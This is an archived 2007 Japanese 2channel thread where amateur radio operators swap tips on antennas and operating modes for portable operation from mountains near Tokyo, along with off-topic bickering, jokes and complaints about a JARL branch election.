富士山反射させて何処とQSOできた?

127 :名無しさんから2ch各局…:2007/05/15(火) 23:50:39
USSR

128 :名無しさんから2ch各局…:2007/05/16(水) 01:03:07
>>127
USSRってジジイ…


八木とかGPでFM?SSB?

129 :名無しさんから2ch各局…:2007/05/16(水) 01:28:14
>>128
つい出来心でレスしちゃったんだよ。すまんなジジイ

130 :名無しさんから2ch各局…:2007/05/16(水) 09:02:04
>>129みたいなジジイはROMってろ


高尾山って時期に因っては混雑するけどどんなANT持って上がる?

131 :名無しさんから2ch各局…:2007/05/16(水) 12:23:38
>>126
ミニ八木使って2、0〜9エリアと出来ました。
>>130
ミニ八木かモービルホイップで充分かと。
混雑が予想されるときは影信山に足を運べば桶っす。

132 :名無しさんから2ch各局…:2007/05/16(水) 14:12:34
>>131
それはSSB?FM?だいたい何Wで?
俺は430FMでお互いにハンディーに付属ホイップの130kmが最高だわ…

133 :名無しさんから2ch各局…:2007/05/16(水) 20:31:54
相手はビック八木でした。ハンディー+ホイップ同士で100km超なら充分っすよ。

134 :132:2007/05/16(水) 20:46:50
>>133
ありがd

135 :名無しさんから2ch各局…:2007/05/21(月) 23:44:02
みんな、どこかのバカに乗せられて高○さんに委任したが死票になりました。ご苦労さん!!<ぷっ

136 :名無しさんから2ch各局…:2007/05/22(火) 00:01:08
高尾山(八王子)と御岳山(青梅)はどちらが移動運用に向いてるのかな?

137 :名無しさんから2ch各局…:2007/05/22(火) 00:13:37
御岳山ほうが良いよ標高高い分飛ぶし
高尾山移動は八王子市固定局と同じ扱いで余り呼ばれない

138 :名無しさんから2ch各局…:2007/05/22(火) 00:18:50
>>123
支部大会に来ないどころか、委任状集めるだけ集めて、
岡山総会で質問を全くしなかったね、高尾山は???

東京都支部長補選に出馬することがその理由ですか?
そんなの通りませんよ。委任状を託した全員に、直ちに謝罪と説明をなさい、高尾義則さん。
これは立派な裏切り行為です。

繰り返しますが、東京都支部長補選に出馬することは、
受け取った委任状を無にして良い理由には、決してなりません。

139 :名無しさんから2ch各局…:2007/05/22(火) 00:23:23
>>130は一生ROMってろよ

140 :名無しさんから2ch各局…:2007/05/22(火) 00:31:46
>>139クソジジイ?

141 :名無しさんから2ch各局…:2007/05/22(火) 00:34:57
>>139は本当の事を言われ怒ったKusoジジイだよプ

142 :名無しさんから2ch各局…:2007/05/22(火) 00:57:33
自演かw

143 :名無しさんから2ch各局…:2007/05/22(火) 00:59:58
もう両方とも消えろよ。スレ違いだろ

144 :名無しさんから2ch各局…:2007/05/22(火) 06:17:02
藻前らも禿げしくスレ違い

145 :名無しさんから2ch各局…:2007/05/22(火) 12:19:25
高尾、御岳以外に近郊でお奨めの山はありますか?

146 :名無しさんから2ch各局…:2007/05/22(火) 20:03:14
堂平山、鋸山、鹿野山、大山、仏果山、経ガ岳、受信マニアなら海ほたるも楽しいかも。

147 :名無しさんから2ch各局…:2007/05/22(火) 21:30:55
>>145
御岳のすぐ隣りの大岳はどうよ?

148 :名無しさんから2ch各局…:2007/05/25(金) 07:23:32
スレタイ嫁

149 :名無しさんから2ch各局…:2007/05/25(金) 07:38:37
代官山どうよ

150 :名無しさんから2ch各局…:2007/05/25(金) 07:48:26
天保山どうよ

151 :名無しさんから2ch各局…:2007/05/25(金) 10:47:17
ジイ山どうよ

152 :名無しさんから2ch各局…:2007/05/25(金) 10:59:42
爺捨山どこよ

153 :名無しさんから2ch各局…:2007/05/25(金) 11:03:00
大石寺

154 :名無しさんから2ch各局…:2007/05/25(金) 22:42:53
学会破門寺か?

155 :名無しさんから2ch各局…:2007/05/25(金) 23:16:34
郡山

156 :名無しさんから2ch各局…:2007/05/26(土) 01:34:31
マジ質問ですが、富士山五合目の駐車場はどんな感じですか?
2メーターサイドバンド
6メーターサイドバンド
を計画してますが。

157 :名無しさんから2ch各局…:2007/05/26(土) 01:44:13
アマ禁止です

158 :名無しさんから2ch各局…:2007/05/26(土) 06:04:00
そんなことはない

159 :名無しさんから2ch各局…:2007/05/26(土) 08:41:00
五合目はメッカ
ググレばたくさん出るぞ

160 :名無しさんから2ch各局…:2007/05/26(土) 12:50:26
高尾山すげー暑いのでもうやめて下山します

161 :名無しさんから2ch各局…:2007/05/26(土) 13:08:44
せっかく金かけて登ったのにもったいない
城山〜影信山〜陣馬山にかけて縦走してみたら?

162 :名無しさんから2ch各局…:2007/05/26(土) 13:22:20
すげー暑いのでモーテル探して一風呂浴びてきまつ。


163 :名無しさんから2ch各局…:2007/05/27(日) 22:31:46
岡山は〜

164 :名無しさんから2ch各局…:2007/06/08(金) 07:21:29
山梨は〜

165 :名無しさんから2ch各局…:2007/06/08(金) 07:43:11
移動運用は乳房山がおすすめでつ。

166 :名無しさんから2ch各局…:2007/06/08(金) 12:50:04
そこは山頂に乳首はあるのか?

167 :名無しさんから2ch各局…:2007/06/08(金) 12:56:40
JD1の母島に行けばわかる。
ついでに、父島には朝勃ち山と呼ばれる山、そして電信山もある。

168 :名無しさんから2ch各局…:2007/06/08(金) 13:24:18
乳首なら安達太良山

169 :名無しさんから2ch各局…:2007/06/09(土) 08:51:46
立候補断念
http://www.jarl.or.jp/Japanese/2_Joho/2-3_Kokuchi/2007/070608_kokuji.pdf
1.東京都支部長
  JH1LWP  島 田 守 康
2.秋田県支部長
  JA7DCY  石 川 和 男
3.富山県支部長
  JH9FEH  高 村 浩 之

170 :名無しさんから2ch各局…:2007/06/10(日) 20:06:44

女装移動中
ttp://bbs1.fc2.com/bbs/img/_5000/4933/full/4933_1181173951.jpg

171 :名無しさんから2ch各局…:2007/06/15(金) 12:26:33
高い授業料やなw

172 :名無しさんから2ch各局…:2007/06/15(金) 19:31:52
今年はホムペで総会参加報告ないのかな。

173 :名無しさんから2ch各局…:2007/06/23(土) 22:42:54
明日、高尾山行きます。気が向いたら応答よろしくです。

174 :名無しさんから2ch各局…:2007/06/23(土) 22:48:00
何メガで遊ぶの?

175 :名無しさんから2ch各局…:2007/06/23(土) 23:06:41
40mCWでVCHアンテナを調整しながら運用します。

176 :名無しさんから2ch各局…:2007/06/23(土) 23:33:42
高尾山まで行って40mかよ。わざわざ登る必要ないだろ?
未知の液でやった方がマシに思える。

177 :名無しさんから2ch各局…:2007/06/24(日) 00:01:39
15m用のフルサイズDPを張ってヒンシュクかっていたヤツも以前にいたからなぁ〜

178 :名無しさんから2ch各局…:2007/07/01(日) 09:49:59
本日高尾山にて運用します

179 :名無しさんから2ch各局…:2007/07/01(日) 11:17:59
本日箱根山にて運用します。
ただし海抜44.6mで、神奈川県で無く新宿区戸山です。
23区最高海抜地です。

180 :名無しさんから2ch各局…:2007/07/01(日) 15:16:19
高尾山からの運用が終りました。各局ありがとうございました

181 :名無しさんから2ch各局…:2007/07/01(日) 21:07:30
高尾山の次は、JD1父島の電信山で!

182 :名無しさんから2ch各局…:2007/07/11(水) 01:35:21
From: [273] 底名無し沼さん <sage> Date: 2007/07/10(火) 15:22:03

この前、陣馬山頂で無線厨の集団と遭遇。
 
でっかいアンテナをぶっ立てて、自慢気に交信してた。
「無線機器を操るカッコイイ僕たち」の雰囲気を醸し出していたが、
勿論ながら他の登山客は何だこいつらはと完全無視。
いや、もう格好悪いを通り越して寧ろ感心してしまった。
今の時代、こういう輩がまだ生き残っていたのか。。。
 
山って普段出会えない人を見掛ける場でもありますね。
________________________________________
From: [274] 底名無し沼さん <> Date: 2007/07/10(火) 16:54:40

あぁ、陣馬山頂でステッキにアンテナつけてる人がいたけど
やっぱ無線なんだ。

お話したければ携帯使えばいいんじゃね?


183 :名無しさんから2ch各局…:2007/07/11(水) 01:35:53
From: [275] 底名無し沼さん <sage> Date: 2007/07/10(火) 18:42:41

ときときいるよね?陣馬山頂の無線の人たち。

携帯で話せよに同文
________________________________________
From: [276] 底名無し沼さん <sage> Date: 2007/07/10(火) 19:40:22

>アマチュア無線
結構うるさいよね。特にスピーカーから流れてくる声が
高尾山や陣馬山頂は観光地だから我慢できるが、誰もいないと思って登ってきた山頂
でこれやられるとたまらん。ヘッドフォン使ってる人も稀にいるけど
________________________________________
From: [277] 底名無し沼さん <sage> Date: 2007/07/10(火) 20:20:54

すみません、皆さんにご迷惑をお掛けしているようで。
携帯で話せば?とのことですが、携帯では繋がらないあちらの世界や、
電話番号を持たない、遥か彼方の仲間と交信しているので、皆さんもパワーを下さい。
さぁ、手を繋いで。


184 :名無しさんから2ch各局…:2007/08/08(水) 20:36:10
僕の彼女はロータで責めると必ず失禁します。
彼女は潮って言うのでそういうことにしています。




185 :名無しさんから2ch各局…:2007/08/08(水) 22:30:19
>>179
そこ知ってるよ
登ると国立感染症研究所がある(感染ニュースでよくテレビに出てくる)
早稲田大学の裏

41 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)